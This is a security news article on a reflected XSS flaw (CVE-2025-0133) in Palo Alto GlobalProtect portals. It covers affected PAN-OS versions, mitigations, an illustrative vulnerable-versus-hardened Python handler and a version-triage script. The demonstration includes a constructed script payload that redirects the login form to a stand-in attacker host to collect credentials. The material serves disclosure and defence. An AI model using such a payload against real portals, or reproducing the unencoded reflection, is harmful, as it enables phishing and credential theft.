Palo Alto GlobalProtect Vulnerability Enables Malicious Code Execution – PoC Released

Palo Alto Networks has disclosed a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-0133, in the GlobalProtect gateway and portal features of its PAN-OS software. A specially crafted link, when opened by an authenticated Captive Portal user, causes attacker-supplied JavaScript to execute in that user's browser. The risk is greatest for organizations that use the Clientless VPN feature: the flaw is rated low severity (CVSS base score 2.0) under default configurations, rising to medium (5.5) when Clientless VPN is enabled.

Understanding CVE-2025-0133

The vulnerability was reported by researchers at XBOW. Because the reflected payload is served from the GlobalProtect portal's own hostname, an attacker can craft phishing and credential-stealing links that appear to be legitimately hosted on the portal; URL reputation checks and a user's own inspection of the address bar offer little protection against such a link. The primary attack vector is social engineering: tricking an authenticated user into clicking it. The flaw is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and CAPEC-591 (Reflected XSS), and successful exploitation runs JavaScript within the security context of the victim's authenticated session. Attackers cannot directly modify GlobalProtect configuration or content, but script running in the portal's origin can present a fake login prompt or redirect the real form, which is how the credential theft described in the advisory would be carried out.
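To make the CWE-79 pattern concrete, the following is an added example and not code from Palo Alto Networks or the GlobalProtect portal: a hypothetical portal login handler that reflects a query parameter into the page unencoded, shown beside the hardened version that entity-encodes it. The portal URL, the parameter name `msg`, and the form markup are assumptions chosen for the illustration, and the payload is constructed for the demonstration rather than taken from any published proof of concept.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed values, chosen for illustration only; the real portal's reflected
# parameter and page structure are not given on this page.
PORTAL = "https://vpn.example.com/global-protect/login.esp"  # hypothetical portal URL
PARAM = "msg"                                                # hypothetical reflected parameter

TEMPLATE = (
    "<html><body><form method='post' action='/login'>"
    "<p class='banner'>{banner}</p>"
    "<input name='user'><input name='passwd' type='password'>"
    "<input type='submit' value='Log in'></form></body></html>"
)


def _reflected_value(url: str) -> str:
    """Pull the value the page will echo back out of the query string."""
    return parse_qs(urlsplit(url).query).get(PARAM, [""])[0]


def render_vulnerable(url: str) -> str:
    """CWE-79: the query value is pasted straight into the HTML, so any tag or
    script carried in the link runs in the viewer's authenticated portal session."""
    return TEMPLATE.format(banner=_reflected_value(url))


def render_hardened(url: str) -> str:
    """Same page, but the value is entity-encoded for its HTML element context;
    the browser renders it as text and never parses it as markup."""
    return TEMPLATE.format(banner=html.escape(_reflected_value(url), quote=True))


def crafted_link(payload: str) -> str:
    """Build the kind of link an attacker would send: it points at the real portal
    host, so URL reputation and the victim's own suspicion work against the defender."""
    return f"{PORTAL}?{urlencode({PARAM: payload})}"


def reflects_markup(page: str, payload: str) -> bool:
    """True when the payload survived output encoding and sits in the page as live markup."""
    return payload in page


# Constructed payload: rewrites the login form so credentials are posted to an attacker host.
PAYLOAD = "<script>document.forms[0].action='https://attacker.example/collect'</script>"

if __name__ == "__main__":
    link = crafted_link(PAYLOAD)
    print("crafted link:", link)
    print("vulnerable handler reflects live markup:", reflects_markup(render_vulnerable(link), PAYLOAD))
    print("hardened handler reflects live markup:  ", reflects_markup(render_hardened(link), PAYLOAD))
```

Running it shows the vulnerable handler returning the `<script>` element as live markup while the hardened handler returns it as `&lt;script&gt;` text. Output encoding for the exact insertion context (HTML body, attribute, JavaScript string, URL) is the fix for CWE-79; filtering the input alone is not, because the attacker controls the link the victim clicks.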

Affected Products and Versions

According to Palo Alto Networks’ advisory, the vulnerability impacts multiple product versions, including:

– Cloud NGFW (all versions)
– PAN-OS 11.2 (prior to 11.2.7)
– PAN-OS 11.1 (prior to 11.1.11)
– PAN-OS 10.2 (prior to 10.2.17)
– PAN-OS 10.1 (all versions)

Notably, Prisma Access remains unaffected by this vulnerability.

Risk Factors

– Affected Products: Cloud NGFW (all versions), PAN-OS 11.2 (prior to 11.2.7), PAN-OS 11.1 (prior to 11.1.11), PAN-OS 10.2 (prior to 10.2.17), and PAN-OS 10.1 (all versions)
– Impact: JavaScript execution in the victim's authenticated browser session, enabling phishing and credential theft
– Exploit Prerequisites: GlobalProtect gateway or portal enabled; an authenticated user must click the crafted link (impact is higher when Clientless VPN is enabled)
– CVSS Base Score: 2.0 (default configuration), 5.5 (Clientless VPN enabled)

Mitigation Strategies

Organizations running affected versions should upgrade where a fixed release is available and apply the compensating mitigations below until they can:

1. Upgrade to Patched Versions:
– PAN-OS 11.2: Version 11.2.7 or later (expected June 2025)
– PAN-OS 11.1: Version 11.1.11 or later (expected July 2025)
– PAN-OS 10.2: Version 10.2.17 or later (expected August 2025)
– PAN-OS 10.1: no fixed release is listed in the advisory, so devices on this train need to move to a supported release line

2. Enable Threat Prevention IDs:
– For customers with Threat Prevention subscriptions, enable Threat Prevention IDs 510003 and 510004 (introduced in Applications and Threats content version 8970).

3. Disable Clientless VPN Functionality:
– Where Clientless VPN is not required, disable it; this removes the configuration that raises the severity from low to medium.
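The fixed-version list above maps directly onto a fleet check. The following is an added example, not a tool from Palo Alto Networks: it parses PAN-OS version strings of the form `major.minor.patch` with an optional `-hN` hotfix suffix, classifies each against the trains and fixed releases named on this page, and ranks affected devices by whether Clientless VPN is enabled, which is what decides between the low and medium scores. Cloud NGFW is vendor-managed and has no version string to check, so it is outside this script. The inventory is constructed sample data.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed releases exactly as listed in the advisory summary on this page.
# None means no fixed release is listed for that train (PAN-OS 10.1), so every
# release in it counts as affected.
FIXED_IN: Dict[Tuple[int, int], Optional[Tuple[int, int, int]]] = {
    (11, 2): (11, 2, 7),
    (11, 1): (11, 1, 11),
    (10, 2): (10, 2, 17),
    (10, 1): None,
}

_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(s: str) -> Tuple[int, int, int, int]:
    """'11.2.4-h3' -> (11, 2, 4, 3). A release with no hotfix suffix is hotfix 0."""
    m = _VER.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {s!r}")
    major, minor, patch, hotfix = m.groups()
    return int(major), int(minor), int(patch), int(hotfix or 0)


def cve_2025_0133_status(version: str) -> str:
    """Return 'affected', 'fixed', or 'not listed' for a PAN-OS version.

    'not listed' means the train is absent from the advisory summary on this
    page; that is not a statement that it is safe, so check the vendor advisory.
    """
    major, minor, patch, _hotfix = parse_panos_version(version)
    fixed = FIXED_IN.get((major, minor), "unknown")
    if fixed == "unknown":
        return "not listed"
    if fixed is None:
        return "affected"
    # Hotfixes on an earlier patch level (e.g. 11.2.6-h4) are still before the fix.
    return "fixed" if (major, minor, patch) >= fixed else "affected"


def triage(inventory: List[Tuple[str, str, bool]]) -> List[Tuple[str, str, str]]:
    """Given (hostname, panos_version, clientless_vpn_enabled) rows, return the
    affected devices with their score band, Clientless VPN users first."""
    rows = []
    for host, version, clientless in inventory:
        if cve_2025_0133_status(version) != "affected":
            continue
        band = "medium (5.5)" if clientless else "low (2.0)"
        rows.append((host, version, band))
    rows.sort(key=lambda r: r[2] != "medium (5.5)")  # stable sort: medium band first
    return rows


# Constructed sample inventory for the demonstration.
INVENTORY = [
    ("fw-dc1", "11.2.4-h3", True),
    ("fw-branch", "10.2.17", False),
    ("fw-legacy", "10.1.14-h9", False),
    ("fw-lab", "11.1.11-h2", True),
    ("fw-old", "11.0.3", True),
]

if __name__ == "__main__":
    for host, version, _ in INVENTORY:
        print(f"{host:10} {version:12} {cve_2025_0133_status(version)}")
    print("\nmitigation order:")
    for host, version, band in triage(INVENTORY):
        print(f"  {host:10} {version:12} {band}")
```

Feed it the version strings from your own inventory; the ordering puts devices with Clientless VPN enabled at the top, matching the advice to prioritize by Clientless VPN usage, and a device that comes back `not listed` should be checked against the vendor advisory rather than assumed clean.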

The exploit itself is a specially crafted URL that, when clicked, causes reflected JavaScript to execute in the user's browser session. User awareness training about suspicious links is recommended as an additional layer of defense, but only as a supplementary control: the malicious link points at the organization's own, trusted portal hostname, which is exactly what makes it convincing.

Current Exploitation Status

Palo Alto Networks has stated that it is not aware of any malicious exploitation of this vulnerability in the wild. However, proof-of-concept code is available, which raises the likelihood of exploitation attempts before patches are widely deployed. Organizations using affected PAN-OS versions should prioritize mitigation based on their Clientless VPN usage, enable the relevant Threat Prevention signatures where they hold a subscription, and schedule the upgrade as the fixed releases become available.